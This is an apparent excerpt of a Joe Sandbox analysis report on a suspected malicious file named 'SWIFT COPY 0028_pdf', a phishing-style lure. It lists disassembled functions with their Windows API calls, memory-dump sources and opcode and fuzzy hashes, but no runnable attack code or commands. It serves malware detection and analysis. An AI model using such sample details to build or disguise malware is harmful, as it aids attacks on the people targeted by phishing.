                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$MoveWindow
                                                                                    • String ID: Listbox
                                                                                    • API String ID: 3315199576-2633736733
                                                                                    • Opcode ID: 0c85adbeec90cc2b1a9ca0d427a1762b84eeaf45f15d20eda4d1313c7ad72a01
                                                                                    • Instruction ID: 2afdf7f8da2c04d6921320cde8320685e7401ac242161bcb507e7733aa12b155
                                                                                    • Opcode Fuzzy Hash: 0c85adbeec90cc2b1a9ca0d427a1762b84eeaf45f15d20eda4d1313c7ad72a01
                                                                                    • Instruction Fuzzy Hash: F521F232610118BFDF259F54CC85FBF3BAEEF89764F058128F9459B290C6719C1187A0
                                                                                    Function 0098A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0098A46D
                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0098A482
                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0098A48F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: msctls_trackbar32
                                                                                    • API String ID: 3850602802-1010561917
                                                                                    • Opcode ID: 26078093a37cd4d6ae6edbbc9d169f4ee6ea8ca8aedf1c3947cb085833cf1dc3
                                                                                    • Instruction ID: 909da5922ccb04a9df85eac86e9144785f07c143b2d5bbe77e7f5d7121aa4d35
                                                                                    • Opcode Fuzzy Hash: 26078093a37cd4d6ae6edbbc9d169f4ee6ea8ca8aedf1c3947cb085833cf1dc3
                                                                                    • Instruction Fuzzy Hash: 1F110671250208BEEF246F75CC49FAB3B6DEFC9B54F014219FA45A61E1D2B6E811DB20
                                                                                    Function 00942287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00942350,?), ref: 009422A1
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 009422A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoInitialize$combase.dll
                                                                                    • API String ID: 2574300362-340411864
                                                                                    • Opcode ID: 2c6ee4fcbc844b8c4f51ada2270fc00edcde461674244f9f7166bf010b3b57fa
                                                                                    • Instruction ID: b22d1d51a7fa58ad0b8bfd9fad46dfde6e1da32e69fb64c553217c5cb0c7bcca
                                                                                    • Opcode Fuzzy Hash: 2c6ee4fcbc844b8c4f51ada2270fc00edcde461674244f9f7166bf010b3b57fa
                                                                                    • Instruction Fuzzy Hash: 30E01A706BD340ABDB105F70ED89B193A68BB82706F404020F112DE4A0DBF84880EF48
                                                                                    Function 0094235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00942276), ref: 00942376
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0094237D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    • API String ID: 2574300362-2819208100
                                                                                    • Opcode ID: b2e3885389ac827b4f2ff2b82773d0c6a61ac4f7541e9ec7ff3b8f0a67e0f62e
                                                                                    • Instruction ID: 415bb105364b29ac44544170576f02e316aa9c9922bc7645dd31049018ff7397
                                                                                    • Opcode Fuzzy Hash: b2e3885389ac827b4f2ff2b82773d0c6a61ac4f7541e9ec7ff3b8f0a67e0f62e
                                                                                    • Instruction Fuzzy Hash: 71E0B6706AE340ABDB205FA1ED4DB043A69BB86B06F100414F10ADA4B0DBF95890EA58
                                                                                    Function 0099AC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    • API String ID: 2070861257-2409531811
                                                                                    • Opcode ID: c77848b4db960e099f70f77f8521b9032a267b68b81b86fbc38c0a1b94f01ab6
                                                                                    • Instruction ID: 785435996d43157eb534dee2a9ed98041f075d5a03b8572cf75e0f2258028457
                                                                                    • Opcode Fuzzy Hash: c77848b4db960e099f70f77f8521b9032a267b68b81b86fbc38c0a1b94f01ab6
                                                                                    • Instruction Fuzzy Hash: 27E012B1805618DBCF109794DD09EF9737CEB04741F144892B986A5104F63D9B84EE53
                                                                                    Function 009242F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009242EC,?,009242AA,?), ref: 00924304
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00924316
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-1355242751
                                                                                    • Opcode ID: 830619f496580b5ece030d56d44e06699e356ffd835af8c73a41ab97359c09df
                                                                                    • Instruction ID: db048593f389b7774a2dc992520757c8c858bb532e11428ccfadfd0bda936d08
                                                                                    • Opcode Fuzzy Hash: 830619f496580b5ece030d56d44e06699e356ffd835af8c73a41ab97359c09df
                                                                                    • Instruction Fuzzy Hash: 67D0A7304587229FC7248F61F80C60577D8AF15305B00C41AE447D2668D7B0C8808650
                                                                                    Function 00982205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,009821FB,?,009823EF), ref: 00982213
                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00982225
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetProcessId$kernel32.dll
                                                                                    • API String ID: 2574300362-399901964
                                                                                    • Opcode ID: 8ea6472fcbb7c6d7996d0546f3e9051684017b55c19917234727ad89a251eb4b
                                                                                    • Instruction ID: bc3b7ce162131ee1679c387199de75dca5e0005993620c41bc2bb7f764f138bd
                                                                                    • Opcode Fuzzy Hash: 8ea6472fcbb7c6d7996d0546f3e9051684017b55c19917234727ad89a251eb4b
                                                                                    • Instruction Fuzzy Hash: 58D0A7344587129FC7295F70F808601B7D8EF06304B00841AE856E3750D770D88097A0
                                                                                    Function 0092434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,009241BB,00924341,?,0092422F,?,009241BB,?,?,?,?,009239FE,?,00000001), ref: 00924359
                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0092436B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-3689287502
                                                                                    • Opcode ID: eb9f9d41353c875993890aea7e985beabb8682795f58dd16cb728276ad69c9af
                                                                                    • Instruction ID: 160d029edeb693d71f7baf3312f27c9dbd04ab9ec0cd81cbab3e269dac707c1a
                                                                                    • Opcode Fuzzy Hash: eb9f9d41353c875993890aea7e985beabb8682795f58dd16cb728276ad69c9af
                                                                                    • Instruction Fuzzy Hash: 10D0A7308587229FC7248F70F80860177D8AF21729B00C51AE482D2650E7B0D8808650
                                                                                    Function 00960539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0096051D,?,009605FE), ref: 00960547
                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00960559
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                    • API String ID: 2574300362-1071820185
                                                                                    • Opcode ID: f83c028b30f6c8e9ec8e41b8b8f158395cc54b3e6a9eec44e29a3782159e55ad
                                                                                    • Instruction ID: 3d55f0d99b21e63c06c15cbba25854a34d74a99bf5cf4887b4d36c5629c7ac04
                                                                                    • Opcode Fuzzy Hash: f83c028b30f6c8e9ec8e41b8b8f158395cc54b3e6a9eec44e29a3782159e55ad
                                                                                    • Instruction Fuzzy Hash: CCD0A73046C7129FC7208F65E84860676E8AF51305B10C81EF487D2660D670CC808A50
                                                                                    Function 00960564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0096052F,?,009606D7), ref: 00960572
                                                                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00960584
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                    • API String ID: 2574300362-1587604923
                                                                                    • Opcode ID: fd0e3482a44a86ea1dc63cb318978ca05beb3df7d6c62a28ce653d17a3f86ab2
                                                                                    • Instruction ID: 0aab80d41c0fd7d64939ec9c9ab1023fee95d96421a078cce858b40b1b041c12
                                                                                    • Opcode Fuzzy Hash: fd0e3482a44a86ea1dc63cb318978ca05beb3df7d6c62a28ce653d17a3f86ab2
                                                                                    • Instruction Fuzzy Hash: CAD0A7304583229FC7205F75E849B037BE8AF55304B10C81FF843D2650D770C4C08A60
                                                                                    Function 0097ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0097ECBE,?,0097EBBB), ref: 0097ECD6
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0097ECE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                    • API String ID: 2574300362-1816364905
                                                                                    • Opcode ID: 642298fdb4566f650b99e4f31e2cc24e8670945d8778e8d00ca78b4993b700ab
                                                                                    • Instruction ID: 4c321ff2483448a8840e5d69b61edd9cdf3bd556fbc632b293b84d3d646d496a
                                                                                    • Opcode Fuzzy Hash: 642298fdb4566f650b99e4f31e2cc24e8670945d8778e8d00ca78b4993b700ab
                                                                                    • Instruction Fuzzy Hash: 0FD0A7364587239FCB255F61E84870277E8AF05304B04C45EF88AD2650DB70C8809A50
                                                                                    Function 0097BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0097BAD3,00000001,0097B6EE,?,009BDC00), ref: 0097BAEB
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0097BAFD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    • Opcode ID: 1e275b83dff28e71ac3d593709fe1ce34b68271e680a0bbadbe5ffcba01de9c4
                                                                                    • Instruction ID: e5f361b179266f8b9c61f2150c780bc45441d7edfd4fccc29f737bf2ba34ba99
                                                                                    • Opcode Fuzzy Hash: 1e275b83dff28e71ac3d593709fe1ce34b68271e680a0bbadbe5ffcba01de9c4
                                                                                    • Instruction Fuzzy Hash: F9D0A7319587129FC7345F61E848B1177D8AF05304B00C41AEC47D2650D770C880C650
                                                                                    Function 00983BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00983BD1,?,00983E06), ref: 00983BE9
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00983BFB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    • Opcode ID: 855acfe91806342cc7fa82a948b78bcea223f323d3b6ba0d348dd7ca367a5876
                                                                                    • Instruction ID: 9418d8b42bcc7debac04717e13a62e46d9f61dba67f927395e8e3446f93e3359
                                                                                    • Opcode Fuzzy Hash: 855acfe91806342cc7fa82a948b78bcea223f323d3b6ba0d348dd7ca367a5876
                                                                                    • Instruction Fuzzy Hash: E9D0A770458712AFC7206FA0E808603BAF8AF02718B10C41AE887E2750D7B0C4808F50
                                                                                    Function 00959B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 419f84b499683b24568e281e98b7e76acc422792b7b613fe9035c7e83278c1e1
                                                                                    • Instruction ID: 2a56c41b475529033612fd853af9dfffe6545cccbedf24cc8ad6066a1959924f
                                                                                    • Opcode Fuzzy Hash: 419f84b499683b24568e281e98b7e76acc422792b7b613fe9035c7e83278c1e1
                                                                                    • Instruction Fuzzy Hash: 41C15D75A0021AEFEB14CF95C884BAEB7B9FF48701F108598ED46AB291D730DE45DB90
                                                                                    Function 0097AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0097AAB4
                                                                                    • CoUninitialize.OLE32 ref: 0097AABF
                                                                                      • Part of subcall function 00960213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0096027B
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097AACA
                                                                                    • VariantClear.OLEAUT32(?), ref: 0097AD9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    • Opcode ID: b4c210e0f0aab6e68ea51629b1d731aeecbf844a2595afca0ca1a172dc8b2267
                                                                                    • Instruction ID: 23280dbf1fe4255741e3c331ab0f366acb10bb1b2dad1617a4365a9391a0ac64
                                                                                    • Opcode Fuzzy Hash: b4c210e0f0aab6e68ea51629b1d731aeecbf844a2595afca0ca1a172dc8b2267
                                                                                    • Instruction Fuzzy Hash: 72A135762047119FCB15EF14C491B1EB7E9BF88710F148859FA9A9B3A2CB34ED44CB86
                                                                                    Function 009591CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                    • String ID:
                                                                                    • API String ID: 2808897238-0
                                                                                    • Opcode ID: 2024122bf9d7566755a36fc2c1c671d55c405f675d5b39863e8b1d8a46a04f64
                                                                                    • Instruction ID: fe1b81ee904b0a1a87af82f0bf805dfec8082f4c7a61570251de0d60d28a4fee
                                                                                    • Opcode Fuzzy Hash: 2024122bf9d7566755a36fc2c1c671d55c405f675d5b39863e8b1d8a46a04f64
                                                                                    • Instruction Fuzzy Hash: 50518330604306DBEB24DF67D89576EB3E9EF85315F20882FE956CB2E1DB7898488705
                                                                                    Function 0094365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
